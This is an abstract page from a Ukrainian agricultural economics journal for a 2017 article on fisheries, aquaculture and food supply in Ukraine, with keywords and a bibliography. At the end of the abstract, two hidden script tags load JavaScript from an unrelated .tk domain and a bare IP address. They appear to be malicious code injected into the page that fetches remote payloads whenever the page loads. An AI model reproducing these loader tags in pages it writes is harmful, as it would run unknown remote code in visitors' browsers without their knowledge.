ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 339.137.2:639.3:339.923:061.1
Економіка агропромислового виробництва

Роль рибного господарства у продовольчому забезпеченні населення України / Вдовенко Н.М., Сокол Л.М. // Економіка АПК. - 2017. - № 10 - С. 49

Мета статті полягає у дослідженні ринку риби, розробці пропозицій щодо забезпечення харчовими продуктами населення, виявленні недоліків рибної політики в умовах глобалізації та нових продовольчих викликів. Досліджено вплив рибної політики на продовольче забезпечення населення. Наведено динаміку виробництва продукції аквакультури і рибальства у світі, проаналізовано вітчизняний ринок риби. Визначено основні аспекти рибної політики України в умовах глобалізації та нових продовольчих викликів. Доведено важливість рибного господарства для місцевих і глобальних продовольчих систем, здійснено аналіз законодавчо-нормативного забезпечення розвитку аквакультури в Україні. Як новизну запропоновано розробити механізм дії моніторингу глобальних пріоритетів і проблем сталого виробництва риби як харчового продукту, що забезпечить здійснення дієвих заходів регулювання ринку продукції аквакультури. Табл.: 3. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: рибна політика, ринок, виробництво, попит, пропозиція, рибне господарство, аквакультура, глобалізація

Список використаних джерел

 1. Tveterаs Sigbjorn, Frank Asche, Mark Bellemare, Martin Smith, Atle Guttormsen, Adun Lem, Kristin Lien, Sefania Vannuccini. Fish Is Food. - The FAO’s Fish Price Index. PLoS ONE. - Vol. 7 - Issue 5: e36731, 2012.
 2. Belton, B., van Asseldonk, I.J.M., Thilsted, S.H., 2014. Faltering fisheries and ascendant aquaculture: Implications for food and nutrition security in Bangladesh. Food Policy 44, 2014. - P. 77-87.
 3. Toufique, K.A., Belton, B., 2014. Is aquaculture pro-poor: Empirical evidence of impacts on fish consumption in Bangladesh. World Dev. 64, P. 609-620.
 4. Ahmed, M., Lorica, M.H., 2002. Improving developing country food security through aquaculture development-lessons from Asia. Food Policy 27, P. 125-141.
 5. Kobayashi, M., Msangi, S., Batka, M., Vannuccini, S., Dey, M.M., Anderson, J.L., 2015. Fish to 2030: the role and opportunity for aquaculture. Aquacult. Econ. Manage. 19, P. 282-300.
 6. Шарило Ю.Є. Державне регулювання аквакультури у контексті світового досвіду / Ю.Є. Шарило, К.О. Рибальченко // Materialy X mezinarodni vědecko-prakticka konference “Nauka i inowacja-2014”, Наука и инновации 07-15 октября 2014 г. Польша, Przemyśl, 07-15 pazdziernika, 2014. - V. 3. - Ekonomiczne nauki: Przemyśl. Nauka i studia, 2014. - С. 90-92.
 7. Шепелєв С.С. Раціональне використання водних біоресурсів у рамках Спільної рибопромислової політики ЄС / С.С. Шепелєв // Наук. вісн. Міжнар. гуманітарного ун-ту. Серія: «Економіка і менеджмент». - 2015. - № 11. - С. 89-92.
 8. Шепелєв С.С. Підвищення рівня конкурентоспроможності рибного господарства через призму впливу зростаючого глобального ринку / С.С. Шепелєв // Наук. Вісн. Полісся. - 2016. - № 3 (7). - С. 76-83.
 9. Добування водних біоресурсів за 2015 рік: Стат. бюл. Державна служба статистики України. - К., 2016. - 30 с.
 10. Vdovenko, N.M. Applied basis of fish policy effect to public food providing / N. M. Vdovenko, L. M. Sokol // Науковий вісник Полісся. - 2017. - № 1 (9), ч. 2. - С. 202-207.
 11. Спільна рибна політика ЄС. Регламент від 11.12.2013 р. № 1380/2013. Офіційний вісник Європейського Співтовариства L354/22.
 12. HLPE, 2014. Sustainable fisheries and aquaculture for food security and nutrition. A report by the High Level Panel of Experts on Food Security and Nutrition of the Committee on World Food Security. Food and Agriculture Organization, Rome, Italy.